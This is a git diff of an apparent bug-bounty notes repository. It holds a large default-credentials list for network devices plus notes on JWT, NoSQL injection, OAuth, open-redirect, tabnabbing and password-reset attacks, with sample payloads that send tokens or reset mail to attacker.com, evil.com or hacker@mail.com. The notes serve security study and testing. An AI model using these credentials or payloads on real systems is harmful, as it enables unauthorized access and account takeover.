-UTStarcom,B-NAS/B-RAS,1000,,guru,*3noguru,, -Ubiquiti,IP Camera system,,HTTP,ubnt,ubnt,, -Unex,NexIP Routers,,,,password,, -Unisys,ClearPath MCP,,Multi,ADMINISTRATOR,ADMINISTRATOR,Admin, -Unisys,ClearPath MCP,,Multi,HTTP,HTTP,Web Server Administration, -Unisys,ClearPath MCP,,Multi,NAU,NAU,Privileged, -Unisys,ClearPath MCP,,Multi,NAU,NAU,Privileged,Network Administration Utility -Unknown,POCSAG Radio Paging,2.05,Port 8000,,password,Admin, -Unknown,System 88,,Console,overseer,overseer,Admin, -VASCO,VACMAN Middleware,2.x,Multi,admin,,Admin,strong authentication server -VMware Inc.,RabbitMQ,,HTTP,guest,guest,Administrator,https://www.rabbitmq.com/access-control.html#default-state -VPASP,VP-ASP Shopping Cart,,HTTP,admin,admin,Admin, -Various,DD-WRT,v23 SP1 Final,HTTP,root,admin,Admin,Alternative firmware -Verifone,Verifone Junior,2.05,,,166816,, -Verilink,NE6100-4 NetEngine,IAD 3.4.8,Telnet,,,Guest, -Verint,IP Camera system,,HTTP,admin,admin,, -Vertex,VERTEX 1501,5.05,,root,vertex25,Administrator, -VideoIQ,IP Camera system,,HTTP,supervisor,supervisor,, -Visual Networks,Visual Uptime T1 CSU/DSU,1,Console,admin,visual,Admin, -Vivotek,IP Camera system,,HTTP,root,,, -Vobis,PC BIOS,,Console,,merlin,, -VxWorks,misc,,Multi,admin,admin,Admin, -VxWorks,misc,,Multi,guest,guest,Guest, -W-Box,IP Camera system,,HTTP,admin,wbox / 123,, -WLAN_3D,Router,,HTTP,Administrator,admin,Admin, -WWWBoard,WWWADMIN.PL,,HTTP,WebAdmin,WebBoard,Admin, -Wanadoo,Livebox,,Multi,admin,admin,Admin, -Wang,Wang,,Multi,CSG,SESAME,Admin, -WashTec,SoftCare Evo,Type SE10,,,00000,unlimited access,https://www.washtec.com.au/files/tech-data/SoftCare2%20EVO%20Manual.pdf -WashTec,SoftCare Evo,Type SE10,,,00001,limited access,https://www.washtec.com.au/files/tech-data/SoftCare2%20EVO%20Manual.pdf -Watch guard,firebox 1000,,Multi,admin,,Admin, -Watchguard,Firebox,,,(blank),wg,admin, -Watchguard,Firebox,3-4.6,Console,,wg (touch password),Admin, -Watchguard,SOHO and SOHO6,Any,FTP,user,pass,Admin, -Watchguard,SOHO and SOHO6,all versions,FTP,user,pass,Admin,works only from the inside LAN -WebRamp,410i,,,wradmin,tracell,Admin, -WebTrends,Enterprise Reporting,,HTTP,Admin,,Admin, -Webmin,Webmin,Any *nix,HTTP,admin,,Admin, -Weidmüeller,IE-SW16-M,,,admin,detmond,admin, -Westell,Ultraline Series3 A90-,1.02.00.04,,admin,password1,Admin,Verizon cable router (Model -Westell,Ultraline Series3 A90-9100EM15-10,1.02.00.04,,admin,password1,Admin,Verizon cable router (Model 9100EM on front) -Westell,Versalink 327,,Multi,admin,,Admin, -Westell,Wang,,Multi,CSG,SESAME,Admin, -Westell,Wirespeed wireless router,,Multi,admin,sysAdmin,Admin, -Westell,Wirespeed,,Multi,admin,password,Admin,also try password: sysAdmin -Win2000,Quick Time 4.0,Englisch,,,,, -Wodsee,IP Camera system,,HTTP,root,,, -WorldClient,AdminServer,,HTTP:2001,WebAdmin,Admin,WorldClient, -Wyse,Winterm 3150,,VNC,,password,Admin,by satadru -Wyse,Winterm,5440XL,Console,root,wyse,Admin, -Wyse,Winterm,5440XL,VNC,VNC,winterm,VNC, -Wyse,Winterm,9455XL,BIOS,,Fireport,BIOS, -Wyse,Winterm,9455XL,BIOS,,Fireport,BIOS,Case Sensitive -Wyse,rapport,4.4,FTP,rapport,r@p8p0r+,ftp logon to controlling ftp server, -Wyse,rapport,4.4,FTP,rapport,r@p8p0r+,ftp logon to, -Wyse,winterm,,Multi,root,,Admin, -X-Micro,WLAN 11b Access Point,1/2/2002,Multi,super,super,Admin,http://secunia.com/advisories/11342/ -X-Micro,WLAN 11b Access Point,37258,Multi,super,super,Admin,http://secunia.com/advisories/ -X-Micro,X-Micro WLAN 11b Broadband Router,1.2.2/1.2.2.3/1.2.2.4/1.6.0.0,Multi,super,super,Admin,From BUGTRAQ -X-Micro,X-Micro WLAN 11b Broadband Router,1.6.0.1,HTTP,1502,1502,Admin,From BUGTRAQ -XAMPP,XAMPP Filezilla FTP Server,,,newuser,wampp,User, -Xavi,7000-ABA-ST1,,Console,,,Admin, -Xavi,7001,,Console,,,Admin, -Xerox,240a,,HTTP,admin,x-admin,Admin, -Xerox,6204,,Multi,,0,Admin, -Xerox,DocuCentre 425,,HTTP,admin,22222,Admin,works for access panel 2 -Xerox,Document Centre 405,,HTTP,admin,admin,Admin, -Xerox,Document Centre 425,,HTTP,admin,,Admin, -Xerox,DocumentCenter 186,2007,,admin,x-admin,admin, -Xerox,Multi Function Equipment,,Multi,admin,2222,Admin, -Xerox,Multi Function Equipment,,Multi,admin,2222,Admin,combo fax/scanner/printer with network access -Xerox,WorkCenter Pro 428,,HTTP,admin,admin,Admin, -Xerox,WorkCentre 7132,,Multi,11111,x-admin,Admin, -Xerox,Workcentre,,,admin,1111,, -Xylan,OmniStack 1032CF,3.2.8,,admin,password,Admin, -Xylan,Omniswitch,,Telnet,admin,switch,Admin, -Xylan,Omniswitch,,Telnet,diag,switch,Admin, -Xylan,Omniswitch,,Telnet,diag,switch,User, -Xylan,Omniswitch,3.1.8,,admin,switch,, -Xylan,omniswitch,,Multi,admin,switch,Admin, -Xyplex,MX-16XX,,,setpriv,system,Admin, -Xyplex,Routers,,Port 7000,,access,User, -Xyplex,Routers,,Port 7000,,system,Admin, -Xyplex,Terminal Server,,Port 7000,,access,User, -Xyplex,Terminal Server,,Port 7000,,system,Admin, -Yakumo,Routers,,HTTP,admin,admin,Admin, -ZEOS,PC BIOS,,Console,,zeosx,Admin, -ZOOM,ZOOM ADSL Modem,,Console,admin,zoomadsl,Admin, -ZTE,F609,ANY,HTTP,admin,Telkomdso123,admin, -ZTE,F660,ANY,HTTP,admin,Web@0063,admin,192.168.1.1 -ZTE,F660,ANY,HTTP,user,user,admin,192.168.1.1 -ZTE,F663,ANY,HTTP,user,user,admin,Interface UC/UPC -ZTE,F670L,ANY,HTTP,user,user,admin,192.168.1.1 -ZTE,ZXDSL 831,4.2,Multi,ADSL,expert03,Admin,Default Password if user does not change it -Zabbix LLC,Zabbix,ANY,HTTP,Admin,zabbix,Administrator,https://www.zabbix.com/documentation/current/manual/quickstart/login -Zcom,,XG1021 N,HTTP,admin,password,,https://www.192-168-1-1-ip.co/router/zcom/XG1021%20N/19187/ -Zcom,Wireless,,SNMP,root,admin,Admin, -Zebra,10/100 Print Server,,Multi,admin,1234,Admin, -Zenith,PC BIOS,,Console,,3098z,Admin, -Zeus,Zeus Admin Server,4.1r2,HTTP,admin,,, -Zorin Group,Zorin OS,,,root,mecktech,Admin,If it doesn’t work try `MeckTech` or `mechtech` -ZyXEL ZyWALL Series,Prestige 660R-61C,,Multi,,admin,Admin, -ZyXEL,641 ADSL,,,,1234,Admin, -ZyXEL,Generic Routers,,Telnet,,1234,Admin, -ZyXEL,Prestige 100IH,,Console,,1234,Admin, -ZyXEL,Prestige 128 Modem-Router,,,,1234,Admin, -ZyXEL,Prestige 643,,Console,,1234,Admin, -ZyXEL,Prestige 645,,HTTP,admin,1234,Admin, -ZyXEL,Prestige 650,,Multi,1234,1234,Admin, -ZyXEL,Prestige 652HW-31 ADSL Router,,HTTP,admin,1234,Admin,http://192.168.1.1 -ZyXEL,Prestige 900,,HTTP,webadmin,1234,Admin,192.168.1.1:8080 -ZyXEL,Prestige,,FTP,root,1234,Admin, -ZyXEL,Prestige,,HTTP,,1234,Admin,http://192.168.1.1 -ZyXEL,Prestige,,Telnet,,1234,Admin, -ZyXeL,660HW,,HTTP,admin,,Admin,terra -ZyXel Based (Generic),Broadband SOHO Router,925ahcd on circuit board print,,admin,0,Admin,Password is 4 zeros. Gray router with pink bezel. -ZyXel,Prestige P660HW,,Multi,admin,1234,Admin, -Zyxel,ES-2108,,Multi,admin,1234,Admin, -Zyxel,G570S,v2,,,1234,Admin, -Zyxel,Generic Routers,,Telnet,,1234,Administrator, -Zyxel,ISDN-Router Prestige 1000,,,,1234,, -Zyxel,NWA1100,,,,1234,Admin, -Zyxel,Presige,660HW,HTTP/FTP/Telnet,,1234,,Default IP 192.168.1.1 -Zyxel,Presige,P-2302R,HTTP,admin,1234,Administrator, -Zyxel,Prestige 650HW31,31,Telnet,192.168.1.1 60020,@dsl_xilno,Admin, -Zyxel,Prestige 652HW-31,HTTP,admin,1234,Administrator,, -Zyxel,Prestige 660HW,,Multi,admin,admin,Admin, -Zyxel,Prestige,652HW-31,HTTP,admin,1234,Administrator, -Zyxel,Router,650-1,Telnet,,1234,Admin,Telefonica -Zyxel,ZyWall 2,,HTTP,,,Admin, -Zyxel,adsl routers,All ZyNOS Firmwares,Multi,admin,1234,Admin,this is default for dsl routers provided by the ISP firstmile.no -accton t-online,accton,,Multi,,0,Admin, -adtran,Agent Card,,Telnet,,ADTRAN,Admin,ctrl-PTT -adtran,Atlas 800/800Plus/810Plus/,,Telnet,,Password,Admin,crtl-L -adtran,Atlas 800/800Plus/810Plus/550,,Telnet,,Password,Admin,crtl-L -adtran,Express 5110/5200/5210,,Telnet,,adtran,Admin,hit enter a few times -adtran,MX2800,,Telnet,,adtran,Admin,hit enter a few times -adtran,NxIQ,,Telnet,,adtran,Admin,hit enter a few times -adtran,Smart 16/16e,,Telnet,,,Admin,hit enter a few times -adtran,Smart 16/16e,,Telnet,,PASSWORD,Admin,hit enter a few times -adtran,T3SU 300,,Telnet,,adtran,Admin,Hit enter a few times -adtran,TSU IQ/DSU IQ,,Telnet,,,Admin,hit enter a few times -adtran,TSU Router Module/,,Telnet,,,Admin,hit enter a few times -adtran,TSU Router Module/L128/L768/1.5,,Telnet,,,Admin,hit enter a few times -alcatel,,,,,,, -alcatel,speed touch home,,,,,, -apc,Smartups 3000,,HTTP,apc,apc,Admin, -apc,Smartups 3000,,HTTP,apc,apc,Admin,By Sentinel Software.net -apple,airport5,1.0.09,Multi,root,admin,Admin,192.168.1.1 -asmack,router,ar804u,HTTP,admin,epicrouter,Admin, -asus,WL500g,,HTTP,admin,admin,Admin, -axis,2100,,Multi,,,Admin, -aztech,DSL-600E,,HTTP,admin,admin,Admin, -bay,cv1001003,,,,,, -canyon,router,,Multi,Administrator,admin,Admin, -cisco,2600 router,,Telnet,cisco,,Admin, -cisco,2600,,Telnet,Administrator,admin,Admin, -cisco,3600,,Telnet,Administrator,admin,Guest, -cisco,ESW-520-24-K9,2.0,,cisco,cisco,admin, -cisco,GSR,,Telnet,admin,admin,admin, -cisco,WRVS4400N,1.0,,admin,admin,admin, -cisco,cva 122,,Telnet,admin,admin,Admin, -comtrend,ct536+,,Multi,admin,,Admin, -conexant,ACCESS RUNNER ADSL CONSOLE PORT 3.27,,Telnet,Administrator,admin,Admin, -conexant,ACCESS RUNNER ADSL,,Telnet,Administrator,admin,Admin, -corecess,3113,,Multi,admin,,Admin, -creative,2015U,,Multi,,,Admin, -cuproplus,bus,,Multi,,,Admin, -cyberguard,all firewalls,all,console + passport1,cgadmin,cgadmin,Admin, -d-link,ads500g,,HTTP,admin,admin,Admin, -d-link,di-524,,HTTP,admin,,Admin, -decnet,decnet,,Multi,operator,admin,Guest, -dell,inspiron,,Multi,,admin,Admin, -digicom,Wavegate 54C,,HTTP,Admin,,Admin, -dlink,adsl,,HTTP,admin,admin,Admin, -draytek,Vigor3300 series,,Telnet,draytek,1234,Admin, -edimax,wireless adsl router,AR-7024,Multi,admin,epicrouter,Admin, -emai,hotmail,,,,,, -enCAD,XPO,,Multi,,,Admin, -ericsson,ericsson acc,,Multi,,,Admin, -ericsson,md110 pabx,up-to-bc9,Multi,,help,varies depending on config minimal list access by default, -fon,La fonera,0.7.1 r1,HTTP,admin,admin,Admin,fon.com -fore,,,,,,, -fujitsu,l460,,,,,, -gatway,solo9100,win95,,,,, -giga,8ippro1000,,Multi,Administrator,admin,Admin, -glFtpD,glFtpD,all,Console,glftpd,glftpd,Admin, -greatspeed,DSL,,HTTP,netadmin,nimdaten,Admin,ETB Colombia -hp,2300,,Multi,admin,admin,Admin, -hp,sa7200,,Multi,admin,,Admin, -hp,sa7200,,Multi,admin,admin,Admin, -huawei incorporate,k3765,9.4.3.16284,,admin,admin,, -iBall,iB-LR6111A,,HTTP,admin,admin,, -iBall,iB-WRB150N,,HTTP,admin,admin,, -iDirect,iNFINITY series,3000/5000/7000,Telnet,admin,P@55w0rd!,Admin,to enable ssh connections to the router: service sshd start -iDirect,iNFINITY series,3000/5000/7000,ssh,root,iDirect,Admin,first enable sshd telnet to router: service sshd start -iPSTAR,iPSTAR Network Box,v.2+,HTTP,admin,operator,Admin,iPSTAR Network Box is used by the CSLoxInfo Broadband Satellite system. -iPSTAR,iPSTAR Satellite Router/Radio,v2,HTTP,admin,operator,Admin,For CSLoxInfo and iPSTAR Customers -iblitzz,BWA711/All Models,All,HTTP,admin,admin,Admin,This Information Works On All Models Of The Blitzz Line -ibm,a20m,,Multi,,admin,Admin, -ihoi,oihoh,lknlkn,HTTP,Administrator,pilou,Admin, -inchon,inchon,inchon,Multi,admin,admin,Admin,inchon -infacta,group mail,,Multi,Administrator,,Admin, -intel,netstructure,480t,Telnet,admin,,Admin, -intex,organizer,,Multi,,,Admin, -ion,nelu,nel,Multi,,admin,Admin,vreau ceva -ion,nelu,nel,Multi,Administrator,admin,Admin,vreau ceva -kaptest,usmle,,HTTP,admin,,Admin, -latis network,border guard,,Multi,,,Admin, -linksys,BEFW11S4,2,Multi,,admin,Admin,Comes up as BEFW11S4 V.2 when you try and log into it. -linksys,ap 1120,,Multi,,,Admin, -linksys,wag354g,,Telnet,admin,admin,User, -linksys,wrt54g,,Multi,admin,admin,Admin, -longshine,isscfg,,HTTP,admin,0,Admin, -lucent,Portmaster 3,unknown,,!root,!ishtar,, -lucent,dsl,,,,,, -lxy_nrg,87418,87418,Multi,,,Admin, -m0n0wall,m0n0wall,1.3,,admin,mono,Administrator,Firewall -maxdata,7000x,,Multi,,,Admin, -maxdata,ms2137,,Multi,,,Admin, -mediatrix 2102,mediatrix 2102,,HTTP,admin,1234,Admin, -medion,Routers,,HTTP,,medion,Admin, -microRouter,900i,,Console/Multi,,letmein,Admin, -microcom,hdms,unknown,,system,hdms,, -motorola,sgb900,,HTTP,admin,motorola,Admin, -motorola,vanguard,,Multi,,,Admin, -mro software,maximo,v4.1,Multi,SYSADM,sysadm,Admin, -msdloto,msdloto,,,,,, -netgear,,,,,,, -netgear,DG834GT,192.168.0.1,Multi,admin,Password,Admin, -netgear,FM114P,,Multi,,,Admin, -netgear,dg834,,Multi,,admin,Admin, -netgear,sc101,,management software,admin,password,Admin, -netgear,sc101,,management,admin,password,Admin, -netlink,rt314,,,,,, -netscreen,firewall,,HTTP,Administrator,,Admin, -netscreen,firewall,,Telnet,Administrator,,Admin, -netscreen,firewall,,Telnet,admin,,Admin, -netscreen,firewall,,Telnet,operator,,Admin, -nortel,dms,,Multi,,,Admin, -nortel,p8600,,Multi,,,Admin, -novell,,,,,,, -olitec (Trendchip),sx 202 adsl modem router,,HTTP,admin,admin,Admin,Firmware: 2.7.0.9(UE0.B1C)3.3.0.23 -olitec,sx 200 adsl modem router,,Multi,admin,adslolitec,Admin,default ip 192.168.0.250 -openELEC,openelec,8.0.4, SSH, root, openelec, sudo access, -openHAB,openHABian,2.5.10,Linux User (SSH & Samba),openhabian,openhabian,user, -openHAB,openHABian,2.5.10,openHAB Remote Console,openhab,habopen,user, -ovislink,WL-1120AP,,Multi,root,,Admin, -panasonic,cf 27,4,Multi,,,Admin, -penril datability,vcp300 terminal server,,Multi,,system,Admin, -pfSense,pfSense Firewall,1.0.1,Multi,admin,pfsense,Admin,http://www.pfsense.com -phpTest,phpTest,0.5.6,HTTP,admin,1234,Admin, -planet,Akcess Point,,HTTP,admin,admin,Admin, -planet,akcess point,,HTTP,admin,admin,Admin, -ptcl,zxdsl831cii,,,admin,admin,, -realtek,8139,,,,,, -sagem,fast 1400w,,Multi,root,1234,Admin, -samsung,modem/router,aht-e300,Multi,admin,password,Admin,after reset -samsung,n620,,Multi,,,Admin, -schoolgirl,member,,,ich,hci,, -security.org,lockpicking,,Multi,admin,,Admin, -seninleyimben,@skan,el rattani,FTP,admin,admin,Admin,11182360608 -sharp,AR-407/S402,,Multi,,,Admin, -siemen,speedstream 5400,059-e440-a02,HTTP,admin,,Admin, -siemens,hipath,,Multi,,,Admin, -silex technology,PRICOM (Printserver),,Multi,root,,Admin,for telnet / HTTP -sitara,qosworks,,Console,root,,Admin, -smc,smc 7904BRA,,Multi,,smcadmin,Admin, -soho,nbg800,unknown,,admin,1234,, -stratacom,all,all,Multi,stratacom,stratauser,Admin, -surecom,ep3501/3506,own os,,admin,surecom,, -telecom,home hauwei,,Multi,operator,,Admin, -telindus,telindus,2002,Telnet,admin,admin,Admin, -thomson,speedtouch 585 v7,2+,,admin,password,administrator,uw club supply u wid dese boxes -topsec,firewall,,Multi,superman,talent,Admin, -toshiba,480cdt,,,,,, -us robotic,adsl gateway wireless router,,wireless router,support,support,super user access,I find it on a manual -us21100060,hp omibook 6100,,Multi,,,Admin, -voy,,,,,,, -webmail,webmail v0.94,,Multi,kol,gniffe,Admin, -westell,2200,,Multi,admin,password,Admin, -winwork,iso sistemi,,Multi,operator,,Admin, -wline,w3000g,,HTTP,admin,1234,Admin, -xd,xdd,xddd,Multi,xd,xd,Admin, -xerox,work centre pro 35,,HTTP,admin,1111,Admin, -xerox,xerox,,Multi,,admin,Admin, -xerox,xerox,,Multi,admin,admin,Admin, -xyplex,switch,3.2,Console,,,Admin, -zyxel,g-570s,,Multi,,admin,Admin, -zyxel,prestige 300 series,zynos 2.*,,,1234,, diff --git a/Misc/Email Spoofing.md b/Misc/Email Spoofing.md index 604fee8..1c5f39b 100644 --- a/Misc/Email Spoofing.md +++ b/Misc/Email Spoofing.md @@ -1,8 +1,9 @@ # Email Spoofing + ## Introduction Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value. -## How to Find +## How to detect 1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing ``` v=spf1 include:_spf.google.com ~all diff --git a/Misc/Exposed API keys.md b/Misc/Exposed API keys.md index 2558fee..c70a2ab 100644 --- a/Misc/Exposed API keys.md +++ b/Misc/Exposed API keys.md @@ -1,10 +1,15 @@ -# Exposed API Keys +# Exposed API Keys / Token OAuth + +## Introduction +Sometimes in a web application, an attacker can find some exposed API keys / token which can lead to financial loss to a company. + +## How to find +1. Find API keys / token by looking at the JavaScript code on the website +2. Find API keys / token by checking the request / response header ## Tools * [Key-Checker](https://github.com/daffainfo/Key-Checker) -## Definition -Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company. - -## How to exploit -[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys \ No newline at end of file +# References +* [keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys +* [all-about-apikey](https://github.com/daffainfo/all-about-apikey) is a repository of detailed information about API Key / Oauth tokens. The repository contain description API key, HTTP request, the response if the API key is valid / no, regex, and the example \ No newline at end of file diff --git a/Misc/JWT Vulnerabilities.md b/Misc/JWT Vulnerabilities.md index 58ffdb1..88776d1 100644 --- a/Misc/JWT Vulnerabilities.md +++ b/Misc/JWT Vulnerabilities.md @@ -1,8 +1,9 @@ # JWT Vulnerabilities + ## Introduction JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. -## How to Exploit +## How to exploit 1. Modify the algorithm to "none" algorithm ``` { @@ -18,5 +19,8 @@ If you change the algorithm from RS256 to HS256, the backend code uses the publi the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code. -Reference: +## Tools +* [jwt-hack](https://github.com/hahwul/jwt-hack) + +## Reference - [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) \ No newline at end of file diff --git a/Misc/Mass Assignment.md b/Misc/Mass Assignment.md index 44f5211..5522e46 100644 --- a/Misc/Mass Assignment.md +++ b/Misc/Mass Assignment.md @@ -1,8 +1,9 @@ # Mass Assignment Attack + ## Introduction Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS -## How to Exploit +## How to exploit - Normal request ``` POST /editdata @@ -30,4 +31,7 @@ HTTP/1.1 200 OK ... username=daffa&admin=true -``` \ No newline at end of file +``` + +## References +* [Pentester Academy](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda) \ No newline at end of file diff --git a/Misc/Password Reset Flaws.md b/Misc/Password Reset Flaws.md index 4cbdd16..32dfb66 100644 --- a/Misc/Password Reset Flaws.md +++ b/Misc/Password Reset Flaws.md @@ -1,5 +1,9 @@ ## Password Reset Flaws +## Introduction +Common security flaws in password reset functionality + +## How to exploit 1. Parameter pollution in reset password ``` POST /reset @@ -77,7 +81,7 @@ email=victim@mail.com%0a%0dcc:hacker@mail.com ``` POST /newaccount [...] -{“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”} +{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"} ``` 9. Find out how the tokens generate @@ -85,4 +89,7 @@ POST /newaccount - Generated based on the ID of the user - Generated based on the email of the user - Generated based on the name of the user -> [For Example](https://medium.com/bugbountywriteup/how-i-discovered-an-interesting-account-takeover-flaw-18a7fb1e5359) \ No newline at end of file + +## References +* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) +* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414) \ No newline at end of file diff --git a/Misc/Tabnabbing.md b/Misc/Tabnabbing.md index a139c6b..bc46528 100644 --- a/Misc/Tabnabbing.md +++ b/Misc/Tabnabbing.md @@ -1,8 +1,9 @@ # Tabnabbing + ## Introduction When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property. -## How to Find +## How to find ```html @@ -20,4 +21,7 @@ When you open a link in a new tab ( target="_blank" ), the page that opens in a ``` 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. -3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. \ No newline at end of file +3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. + +## References +* [Hackerone #260278](https://hackerone.com/reports/260278) \ No newline at end of file diff --git a/NoSQL Injection.md b/NoSQL Injection.md index 6054e7f..5e5563d 100644 --- a/NoSQL Injection.md +++ b/NoSQL Injection.md @@ -1,11 +1,9 @@ ## NoSQL injection -## Tools - -* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) - -## Exploit +## Introduction +NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. +## How to Exploit ### Authentication Bypass Basic authentication bypass using not equal ($ne) or greater ($gt) @@ -137,7 +135,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi [$ne]=1 ``` -## References +## Tools +* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) +## References * [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection) * [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md) \ No newline at end of file diff --git a/OAuth Misconfiguration.md b/OAuth Misconfiguration.md index 00be06f..8655650 100644 --- a/OAuth Misconfiguration.md +++ b/OAuth Misconfiguration.md @@ -1,16 +1,22 @@ # OAuth Misconfiguration -1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses). -2. Change Referral header to attacker(.)com while requesting OAuth. -3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials. + +## Introduction +The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account. + +## How to find +1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses). +2. Change Referral header to attacker.com while requesting OAuth. +3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials. 4. OAuth Token Re-use. 5. Missing or broken state parameter. 6. Lack of origin check. 7. Open Redirection on another endpoint > Use it in redirect_uri 8. If there is an email parameter after signin then try to change the email parameter to victim's one. 9. Try to remove email from the scope and add victim's email manually. -10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com -11. Check if its leaking client_secret parameter. -12. Go to the browser history and check if the token is there. +10. Only company's email is allowed? > Try to replace hd=company.com to hd=gmail.com +11. Check if its leaking client_secret parameter. +12. Go to the browser history and check if the token is there. -Reference: -- https://twitter.com/tuhin1729_/status/1417843523177484292 +## References +* [tuhin1729_](https://twitter.com/tuhin1729_/status/1417843523177484292) +* [c0d3x27](https://infosecwriteups.com/the-oauth-misconfiguration-15e66dd19a6e) \ No newline at end of file diff --git a/Open Redirect.md b/Open Redirect.md index 3e1fb93..621fce3 100644 --- a/Open Redirect.md +++ b/Open Redirect.md @@ -1,5 +1,9 @@ ## Open Redirect +## Introduction +Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain + +## How to Find 1. Try change the domain ``` /?redir=evil.com @@ -87,4 +91,8 @@ http://ⓔⓥⓘⓛ.ⓒⓞⓜ 17. Bypass the filter if it only allows yoou to control the path using a nullbyte `%0d` or `%0a` ``` /?redir=/%0d/evil.com -``` \ No newline at end of file +``` + +## References +* [Hackerone #1250758](https://hackerone.com/reports/1250758) +* [@ahmadbrainworks](https://medium.com/@ahmadbrainworks/bug-bounty-how-i-earned-550-in-less-than-5-minutes-open-redirect-chained-with-rxss-8957979070e5) \ No newline at end of file diff --git a/README.md b/README.md index ba18c73..9e724a0 100644 --- a/README.md +++ b/README.md @@ -7,6 +7,7 @@ These are my bug bounty notes that I have gathered from various sources, you can ![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty) ## List +- [Arbitrary File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Arbitrary%20File%20Upload.md) - [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md) - [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md) - [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) @@ -27,14 +28,7 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md) - [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md) - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md) -- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md) - -## List CMS -- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md) - -## List Framework -- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md) -- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md) +- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) ## Miscellaneous - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md) @@ -52,7 +46,10 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) - [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md) - [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md) +- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Laravel.md) - [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md) +- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md) +- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Zend.md) ## Reconnaissance - [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md) diff --git a/Recon/Scope.md b/Recon/Scope.md index 74b47d8..f030592 100644 --- a/Recon/Scope.md +++ b/Recon/Scope.md @@ -11,6 +11,7 @@ Only Specific URLs are part of Scope. This usually includes staging/dev/testing - [x] Broken Link Hijacking - [x] Data Breach Analysis - [x] Misconfigured Cloud Storage + * ### __Medium Scope__ Usually the scope is wild card scope where all the subdomains are part of scope - [x] Subdomain Enumeration @@ -33,6 +34,7 @@ Usually the scope is wild card scope where all the subdomains are part of scope - [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, 